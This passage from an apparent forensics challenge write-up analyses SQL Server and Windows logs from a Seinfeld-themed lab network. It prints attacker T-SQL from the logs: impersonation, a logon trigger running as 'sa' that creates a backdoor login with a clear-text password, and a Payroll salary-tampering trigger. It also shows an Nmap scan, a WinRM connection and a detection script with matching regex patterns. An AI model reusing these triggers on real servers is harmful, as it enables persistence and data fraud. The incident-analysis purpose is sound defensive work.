</div><div><br /></div><div><div>Comment: The previously created stored procedure is being used. The Seinfeld_Employees database is selected, and tests are done before and after the call to see if the account is a "<i>sysadmin</i>".</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;">41 "sql_batch_completed","2023-07-23 19:20:03.0824037","2023-07-23 19:20:03.0824037","0","7565","0","136","205","8","0","0","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; USE Seinfeld_Employees; </span><b><span style="color: #fcff01;">DROP PROCEDURE Going_Up</span></b><span style="color: white;">; USE master; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:20:02.3085744"</span></span>
</pre></div>
</div><div><br /></div><div><div>Comment: The stored procedure is being dropped.</div><div><br /></div><div>Similarly for the triggers: I was not able initially to find this information via packet analysis, but we now see it here.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">$ cat sql_logs.csv --number | grep --ignore-case --perl-regexp 'trigger' </span>
<span style="color: white;"> 35 "sql_batch_completed","2023-07-23 19:18:50.6740293","2023-07-23 19:18:50.6740293","15000","8819","0","88","552","6","0","1","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; DECLARE @SQL NVARCHAR(MAX); SET @SQL = N' </span><span style="color: #fcff01;"><b>CREATE TRIGGER MasterOfMySQL </b></span><span style="color: white;">ON ALL SERVER WITH EXECUTE AS ''sa'' AFTER LOGON AS BEGIN IF ORIGINAL_LOGIN() = ''JerrySQL'' BEGIN IF NOT EXISTS (SELECT 1 FROM sys.server_principals WHERE name = ''MailManSQL'') BEGIN CREATE LOGIN MailManSQL WITH PASSWORD = ''L4rg3j4mb4l4y4s0up!!!''; END END END;'; EXEC sp_executesql @SQL; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:18:51.7700571"</span>
</pre></div>
</div><div><br /></div><div>Comment: Using the <i>GeorgeSQL </i>login, a server-scoped logon trigger named <i>MasterOfMySQL </i>is created (<i>ON ALL SERVER</i> means server scope, not "all servers") and it runs <i>WITH EXECUTE AS 'sa'</i>. Each time <i>JerrySQL</i> logs on, it creates the <i>MailManSQL </i>login if it does not already exist. Two things are worth noting: the DDL is wrapped in a string and run through <i>sp_executesql</i>, and the password of the new login is captured in clear text by the extended events session, so the exported log itself now holds a credential.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> 36 "sql_batch_completed","2023-07-23 19:19:02.1382526","2023-07-23 19:19:02.1382526","0","975","0","0","2","0","0","0","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; </span><span style="color: #fcff01;"><b>ENABLE TRIGGER MasterOfMySQL</b></span><span style="color: white;"> ON ALL SERVER; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:19:02.5253289"</span>
</pre></div>
</div><div><br /></div><div><div>Comment: The trigger is being enabled.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span><span style="color: white;"> 38 "sql_batch_completed","2023-07-23 19:19:45.1361731","2023-07-23 19:19:45.1361731","0","8129","0","136","213","11","0","1","OK"," DECLARE @SqlScript NVARCHAR(MAX); SET @SqlScript = N' </span><b><span style="color: #fcff01;">CREATE OR ALTER TRIGGER NoLowSalaryForYou</span></b><span style="color: white;"> ON Payroll AFTER UPDATE AS BEGIN DECLARE @Threshold DECIMAL(10, 2) = 123456; DECLARE @ID INT = 5; IF UPDATE(Salary) BEGIN UPDATE a SET Salary = CASE WHEN b.Salary < @Threshold THEN @Threshold ELSE b.Salary END FROM Payroll a JOIN inserted b ON a.id = b.id WHERE a.id = @ID; END END;'; EXEC sp_executesql @SqlScript; USE master; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:19:44.6864483"</span></span>
</pre></div>
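</div><div><br /></div><div>Before moving on to the Windows logs, here is a small triage script for the <i>sql_batch_completed</i> export shown above. It is an added example, not code from the original post or from the challenge: it parses the CSV rows, flags the patterns seen in entries 23, 35, 36, 38 and 41 (login impersonation, sysadmin probing, server-scoped logon triggers running as <i>sa</i>, DML triggers, dynamic SQL, login creation with a password, and clean-up) and blanks the clear-text password before the findings are written anywhere. The column positions and the absence of a header row are assumptions based on the rows above; the sample rows are constructed copies of those entries.</div><div><br /></div><div>

```python
"""Added example (not part of the original post or the challenge files): triage of
SQL Server Extended Events "sql_batch_completed" rows exported to CSV.

Assumptions: the export has no header row and, going by the rows shown in the post,
column 12 (0-based) holds the batch text, column 13 the session login and
column 20 the client host name.  SAMPLE_CSV is a constructed copy of entries
23, 35, 36, 38 and 41 from the post.
"""
import csv
import io
import re

BATCH_TEXT, SESSION_LOGIN, CLIENT_HOST = 12, 13, 20   # assumed column positions

# One regex per thing worth flagging in a batch; all are matched case-insensitively.
RULES = {
    "impersonation":       r"EXECUTE\s+AS\s+LOGIN\s*=\s*'(?P<login>[^']+)'",
    "sysadmin_probe":      r"IS_SRVROLEMEMBER\s*\(\s*'sysadmin'\s*\)",
    "sysadmin_grant":      r"sp_addsrvrolemember|ALTER\s+SERVER\s+ROLE\s+\[?sysadmin\]?\s+ADD\s+MEMBER",
    "server_trigger":      r"CREATE\s+(?:OR\s+ALTER\s+)?TRIGGER\s+\S+\s+ON\s+ALL\s+SERVER",
    "logon_trigger":       r"AFTER\s+LOGON",
    "exec_as_sa":          r"WITH\s+EXECUTE\s+AS\s+'+sa'+",
    "dml_trigger":         r"CREATE\s+(?:OR\s+ALTER\s+)?TRIGGER\s+\S+\s+ON\s+(?!ALL\s+SERVER)\S+\s+"
                           r"(?:AFTER|FOR|INSTEAD\s+OF)\s+(?:INSERT|UPDATE|DELETE)",
    "login_with_password": r"CREATE\s+LOGIN\s+\[?\w+\]?\s+WITH\s+PASSWORD\s*=\s*N?'+[^']+'+",
    "dynamic_sql":         r"\bsp_executesql\b",
    "cleanup":             r"DROP\s+(?:PROCEDURE|TRIGGER|LOGIN)\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}
# Extended Events records the whole batch, so CREATE LOGIN ... WITH PASSWORD leaves a
# clear-text credential in the log; blank it before the findings go anywhere.
PASSWORD_RE = re.compile(r"(PASSWORD\s*=\s*N?'+)([^']+)('+)", re.IGNORECASE)


def redact_secrets(text):
    return PASSWORD_RE.sub(lambda m: m.group(1) + "[redacted]" + m.group(3), text)


def triage_row(row):
    """Return a finding for one CSV row, or None if no rule matched."""
    if len(row) <= CLIENT_HOST or row[0] != "sql_batch_completed":
        return None
    text = row[BATCH_TEXT]
    hits = {name for name, rx in COMPILED.items() if rx.search(text)}
    if not hits:
        return None
    imp = COMPILED["impersonation"].search(text)
    return {
        "time": row[1],
        "session_login": row[SESSION_LOGIN],                                   # who owns the connection
        "effective_login": imp.group("login") if imp else row[SESSION_LOGIN],  # who the batch runs as
        "client_host": row[CLIENT_HOST],
        "rules": sorted(hits),
        "batch": redact_secrets(text),
    }


def triage_csv(csv_text):
    """Run every rule over every row; only rows that hit at least one rule are returned."""
    return [f for f in (triage_row(r) for r in csv.reader(io.StringIO(csv_text))) if f]


SAMPLE_CSV = """\
"sql_batch_completed","2023-07-23 19:16:18.3869066","2023-07-23 19:16:18.3869066","0","12751","0","29","375","3","0","10","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; USE Seinfeld_Employees; SELECT IS_SRVROLEMEMBER('sysadmin') as isSysadmin; EXEC Going_Up; SELECT IS_SRVROLEMEMBER('sysadmin') as isSysadmin; USE master; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:16:18.5402140"
"sql_batch_completed","2023-07-23 19:18:50.6740293","2023-07-23 19:18:50.6740293","15000","8819","0","88","552","6","0","1","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; DECLARE @SQL NVARCHAR(MAX); SET @SQL = N' CREATE TRIGGER MasterOfMySQL ON ALL SERVER WITH EXECUTE AS ''sa'' AFTER LOGON AS BEGIN IF ORIGINAL_LOGIN() = ''JerrySQL'' BEGIN IF NOT EXISTS (SELECT 1 FROM sys.server_principals WHERE name = ''MailManSQL'') BEGIN CREATE LOGIN MailManSQL WITH PASSWORD = ''L4rg3j4mb4l4y4s0up!!!''; END END END;'; EXEC sp_executesql @SQL; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:18:51.7700571"
"sql_batch_completed","2023-07-23 19:19:02.1382526","2023-07-23 19:19:02.1382526","0","975","0","0","2","0","0","0","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; ENABLE TRIGGER MasterOfMySQL ON ALL SERVER; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:19:02.5253289"
"sql_batch_completed","2023-07-23 19:19:45.1361731","2023-07-23 19:19:45.1361731","0","8129","0","136","213","11","0","1","OK"," DECLARE @SqlScript NVARCHAR(MAX); SET @SqlScript = N' CREATE OR ALTER TRIGGER NoLowSalaryForYou ON Payroll AFTER UPDATE AS BEGIN DECLARE @Threshold DECIMAL(10, 2) = 123456; DECLARE @ID INT = 5; IF UPDATE(Salary) BEGIN UPDATE a SET Salary = CASE WHEN b.Salary < @Threshold THEN @Threshold ELSE b.Salary END FROM Payroll a JOIN inserted b ON a.id = b.id WHERE a.id = @ID; END END;'; EXEC sp_executesql @SqlScript; USE master; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:19:44.6864483"
"sql_batch_completed","2023-07-23 19:20:03.0824037","2023-07-23 19:20:03.0824037","0","7565","0","136","205","8","0","0","OK","EXECUTE AS LOGIN = 'GeorgeSQL'; USE Seinfeld_Employees; DROP PROCEDURE Going_Up; USE master; REVERT;","JerrySQL","52","0xE004C7E8A806C94CAF88C8CFDB0F9C93","JerrySQL","MSSQL-SR","master","4000","JERRY-PC","33D27F8B-5117-4AC4-A81E-EDA8BFD9F5E3","Framework Microsoft SqlClient Data Provider","2023-07-23 19:20:02.3085744"
"""

if __name__ == "__main__":
    for f in triage_csv(SAMPLE_CSV):
        print(f["time"], f["session_login"], "acting as", f["effective_login"], f["rules"])
```

</div><div><br /></div><div>Pointing <i>triage_csv</i> at the full export instead of the sample gives the same shape of output as the grep above, but with the session login and the impersonated login side by side, which is what makes the <i>JerrySQL</i> connection impersonating <i>GeorgeSQL</i> stand out, and with the <i>MailManSQL</i> password already blanked.</div><div><br /></div><div>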
</div><div><br /></div><div><div>Comment: <i>CREATE OR ALTER</i> creates the trigger if it does not exist and replaces it if it does. The trigger fires after an <i>UPDATE </i>to the Payroll table and, when the Salary column was part of the update, rewrites the salary of the row with id 5 so that it never drops below 123456: a new value below that threshold is replaced by the threshold, a higher value is kept. As with the logon trigger, the DDL is hidden inside a string passed to <i>sp_executesql</i>.</div></div><div><br /></div><div><br /></div><div><div><span style="font-size: large;"><b>Log Analysis - Windows Logs</b></span></div></div><div><br /></div><div><div>While I am not aware of its importance at this time, I do find<i> la57setup.exe</i> within the 10-240-240-4-<i>events.csv log</i> file to be an interesting file, based on its name. Searching my system to see whether such a file exists by default on Windows 10:</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">C:\users\securitynik></span><b><span style="color: #fcff01;">ver</span></b><span style="color: white;">
Microsoft Windows [</span><span style="color: #fcff01;"><b>Version 10.0.19044.332</b></span><span style="color: white;">4]</span>
</pre></div></div><div><br /></div></div><div>The search did not produce any results<br /><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">C:\users\securitynik></span><span style="color: #fcff01;"><b>dir /S c:\la57setup.exe</b></span><span style="color: white;">
Volume in drive C has no label.
Volume Serial Number is 728F-A8BE
</span><b><span style="color: #fcff01;">File Not Found</span></b>
</pre></div></div><div><br /></div></div><div>Starting off with the device at <i>10.240.240.5</i>, now recognized as "<i>NEWMAN-PC</i>".</div><div><br /></div><div>Sorting the Windows logs in the Windows Event Viewer by "<i>Date and Time</i>", with the earlier events at the top and the more recent ones at the bottom.</div><div><br /></div><div>Scrolling through the logs we see:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">SetValue</span>
<span style="color: white;">2023-07-23 23:09:13.679</span>
<span style="color: white;">EV_RenderedValue_3.00</span>
<span style="color: white;">848</span>
<span style="color: white;">C:\Windows\system32\LogonUI.exe</span>
<span style="color: white;">HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\</span><span style="color: #fcff01;"><b><span>LastLoggedOnUser</span>
<span>.\Newman</span></b></span>
<span style="color: white;">NT AUTHORITY\SYSTEM</span>
</pre></div>
</div><div><br /></div><div><div>This confirms that "Newman" was the last user to log on to the system, at 23:09:13 on 2023-07-23: <i>LogonUI.exe</i> writes the <i>LastLoggedOnUser</i> value at interactive logon.</div><div><br /></div><div>We are able to see below that Newman has Nmap on his system, not sure why this is needed:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:09:57.946 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b345-64bd-8c00-000000004200} </span>
<span style="color: white;"> ProcessId 6540 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">Image C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe </span></b></span>
<span style="color: white;"> FileVersion 3.10.11 </span>
<span style="color: white;"> Description Python </span>
<span style="color: white;"> Product Python </span>
<span style="color: white;"> Company Python Software Foundation </span>
<span style="color: white;"> OriginalFileName pythonw.exe </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>CommandLine "C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe" -c "from zenmapGUI.App import run;run()"</b></span><span style="color: white;"> </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> CurrentDirectory C:\Program Files (x86)\Nmap\ </span></b></span><b><span style="color: #fcff01;">
<span> User NEWMAN-PC\Newman </span></span></b>
<span style="color: white;"> LogonGuid {758cb1f7-b319-64bd-4ec6-050000000000} </span>
<span style="color: white;"> LogonId 0x5c64e </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel Medium </span>
<span style="color: white;"> Hashes MD5=0B3043DC9F9DB2C90D6E116F0862B2D1,SHA256=5198F9DCE2295F913EA0C1D21F0E3C92296F3926E7C1DC87B0308EE0BFD140FE,IMPHASH=CF4CF1ED1C13C236668C924DFD14E4B4 </span>
<span style="color: white;"> ParentProcessGuid {758cb1f7-b31c-64bd-5d00-000000004200} </span>
<span style="color: white;"> ParentProcessId 4132 </span>
<span style="color: white;"> ParentImage C:\Windows\explorer.exe </span>
<span style="color: white;"> ParentCommandLine C:\Windows\Explorer.EXE </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">ParentUser NEWMAN-PC\Newman </span></b></span>
</pre></div>
</div><div><br /></div><div><div>We next see that Nmap is used to scan the network <i>10.240.240.0/24</i>: <i>-sV</i> performs a version scan (<i>--version-light</i> limits the probes sent), <i>-O</i> enables OS detection, <i>-F</i> restricts the scan to Nmap's 100 most common ports, <i>-T4</i> speeds it up and <i>-oX</i> writes the results to an XML file in Newman's Temp folder. The parent is <i>pythonw.exe</i> from the Zenmap directory, so the scan was driven from the Zenmap GUI, which calls the actual <i>nmap.exe</i> file.</div><div><br /></div><div><i>nmap.exe" -sV -T4 -O -F -oX C:\Users\Newman\AppData\Local\Temp\zenmap-cjwelvey.xml --version-light 10.240.240.0/24</i></div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:10:05.705 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b34d-64bd-8e00-000000004200} </span>
<span style="color: white;"> ProcessId 6708 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>Image C:\Program Files (x86)\Nmap\nmap.exe </b></span>
<span style="color: white;"> FileVersion 7.94 </span>
<span style="color: white;"> Description Nmap </span>
<span style="color: white;"> Product Nmap </span>
<span style="color: white;"> Company Insecure.Org </span>
<span style="color: white;"> OriginalFileName nmap.exe </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">CommandLine "C:\Program Files (x86)\Nmap\nmap.exe" -sV -T4 -O -F -oX C:\Users\Newman\AppData\Local\Temp\zenmap-cjwelvey.xml --version-light 10.240.240.0/24 </span></b></span><b><span style="color: #fcff01;">
<span> CurrentDirectory C:\Program Files (x86)\Nmap\ </span>
<span> User NEWMAN-PC\Newman </span></span></b>
<span style="color: white;"> LogonGuid {758cb1f7-b319-64bd-4ec6-050000000000} </span>
<span style="color: white;"> LogonId 0x5c64e </span>
<span style="color: white;"> TerminalSessionId 1 </span>
<span style="color: white;"> IntegrityLevel Medium </span>
<span style="color: white;"> Hashes MD5=C7796D918785956C9235CCF3490132BF,SHA256=9C5B213A5E910E49781F540F1AB975B38BEC460C3B7B8DDA04B0C415D7C5343A,IMPHASH=5AFF993A0259F16A3997F947B2EEBD27 </span>
<span style="color: white;"> ParentProcessGuid {758cb1f7-b345-64bd-8c00-000000004200} </span>
<span style="color: white;"> ParentProcessId 6540 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">ParentImage C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe </span></b></span><b><span style="color: #fcff01;">
<span> ParentCommandLine "C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe" -c "from zenmapGUI.App import run;run()" </span>
<span> ParentUser NEWMAN-PC\Newman </span>
</span></b></pre></div>
</div><div><br /></div><div><div>Here is an example of a TCP connection being made to "JERRY-PC" by <i>nmap.exe</i>. The connection below is to port 139 (<i>netbios-ssn</i>); there are also connections to ports 135 and 445.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:10:08.559 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b34d-64bd-8e00-000000004200} </span>
<span style="color: white;"> ProcessId 6708 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">Image C:\Program Files (x86)\Nmap\nmap.exe </span></b></span><b><span style="color: #fcff01;">
<span> User NEWMAN-PC\Newman </span></span></b>
<span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<b><span style="color: #fcff01;"><span> SourceIp 10.240.240.5 </span>
</span></b><span style="color: #fcff01;"><b><span> SourceHostname Newman-PC </span>
</b></span><b><span style="color: #fcff01;"><span> SourcePort 49676 </span>
</span></b><span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">DestinationIp 10.240.240.4 </span></b></span><b><span style="color: #fcff01;">
<span> DestinationHostname JERRY-PC </span>
<span> DestinationPort 139 </span></span></b>
<span style="color: white;"> DestinationPortName netbios-ssn </span>
</pre></div>
</div><div><br /></div><div><div>There are also connections to the host at 10.240.240.6 on ports 135, 139, 445 and 1433</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:10:08.560 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b34d-64bd-8e00-000000004200} </span>
<span style="color: white;"> ProcessId 6708 </span>
<b><span style="color: white;"> Image C:\Program Files (x86)\Nmap\nmap.exe </span>
<span style="color: white;"> User NEWMAN-PC\Newman </span>
</b><span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<span style="color: white;"> SourceIp 10.240.240.5 </span>
<span style="color: white;"> SourceHostname Newman-PC </span>
<span style="color: white;"> SourcePort 49681 </span>
<span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span style="color: white;"> DestinationIp 10.240.240.6 </span>
<span style="color: white;"> DestinationHostname - </span>
<span style="color: white;"> DestinationPort 1433 </span>
<span style="color: white;"> DestinationPortName ms-sql-s </span>
</pre></div>
</div><div><br /></div><div><div>Newman may not have recognized it, but because the whole subnet was chosen with no <i>--exclude</i>, he is also scanning his own machine :-)</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"> EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:10:35.832 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b34d-64bd-8e00-000000004200} </span>
<span style="color: white;"> ProcessId 6708 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> Image C:\Program Files (x86)\Nmap\nmap.exe </span></b></span><b><span style="color: #fcff01;">
</span></b><span><b><span style="color: #fcff01;"> User NEWMAN-PC\Newman</span></b><span style="color: white;"> </span></span>
<span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<b><span style="color: #fcff01;"><span> SourceIp 10.240.240.5 </span>
<span> SourceHostname Newman-PC </span>
</span></b><span style="color: white;"> SourcePort 49699 </span>
<span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">DestinationIp 10.240.240.5 </span></b></span><b><span style="color: #fcff01;">
<span> DestinationHostname Newman-PC </span></span></b>
<span style="color: white;"> DestinationPort 445 </span>
<span style="color: white;"> DestinationPortName microsoft-ds </span>
</pre></div>
</div><div><br /></div><div><div>If we had access to Newman's PC, we could corroborate this evidence by looking at the registry. The key below, under <i>AppCompatFlags\Compatibility Assistant\Store</i> in Newman's user hive, is the Program Compatibility Assistant's record of executables that have been run, and it now lists Zenmap's <i>pythonw.exe</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName InvDB </span>
<span style="color: white;"> EventType SetValue </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">UtcTime 2023-07-23 23:10:47.421 </span></b></span>
<span style="color: white;"> ProcessGuid {758cb1f7-b312-64bd-1700-000000004200} </span>
<span style="color: white;"> ProcessId 1176 </span>
<span style="color: white;"> Image C:\Windows\System32\svchost.exe </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b>TargetObject HKU\S-1-5-21-2404277346-2099594652-1884649452-1010\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files (x86)\Nmap\zenmap\bin\pythonw.exe</b></span><span style="color: white;"> </span>
<span style="color: white;"> Details Binary Data </span>
<span style="color: white;"> User NT AUTHORITY\SYSTEM </span>
</pre></div>
</div><div><br /></div><div><div>Next up, we see <i>powershell.exe</i> on <i>NEWMAN-PC</i> connect from source port <i>49704</i> to port <i>5985</i> on <i>Jerry-PC</i>. Port 5985 is WinRM over HTTP, the transport used by PowerShell Remoting. It is interesting that Newman knew of port <i>5985</i>, as I did not see any response/evidence for this in the logs. More importantly, as we know, this is a challenge, not a real-world incident. Hence this is more than likely due to prior knowledge. It could also be that this was learned via scanning but the evidence was just not in the log. So many possibilities.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:07.856 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b3f8-64bd-a900-000000004200} </span>
<span style="color: white;"> ProcessId 6764 </span>
<span style="color: white;"> </span><span style="color: #fcff01;"><b><span>Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe </span>
<span> User NEWMAN-PC\Newman </span></b></span>
<span style="color: white;"> Protocol tcp </span>
<span style="color: white;"> Initiated true </span>
<span style="color: white;"> SourceIsIpv6 false </span>
<span style="color: white;"> SourceIp 10.240.240.5 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;">SourceHostname Newman-PC </span></b></span>
<span style="color: white;"> SourcePort 49704 </span>
<span style="color: white;"> SourcePortName - </span>
<span style="color: white;"> DestinationIsIpv6 false </span>
<span style="color: white;"> DestinationIp 10.240.240.4 </span>
<span><span style="color: white;"> </span><b><span style="color: #fcff01;"> DestinationHostname JERRY-PC </span></b></span><b><span style="color: #fcff01;">
<span> DestinationPort 5985 </span></span></b>
<span style="color: white;"> DestinationPortName - </span>
</pre></div>
</div><div><br /></div><div><div>This information is confirmed by what was identified in the PCAP file and the analysis done above. The same is true for the following two connections, from source ports 49705 and 49706 respectively.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">- EventData </span>
<span style="color: white;"> RuleName - </span>
<span style="color: white;"> UtcTime 2023-07-23 23:13:08.243 </span>
<span style="color: white;"> ProcessGuid {758cb1f7-b3f8-64bd-a900-000000004200} </span>
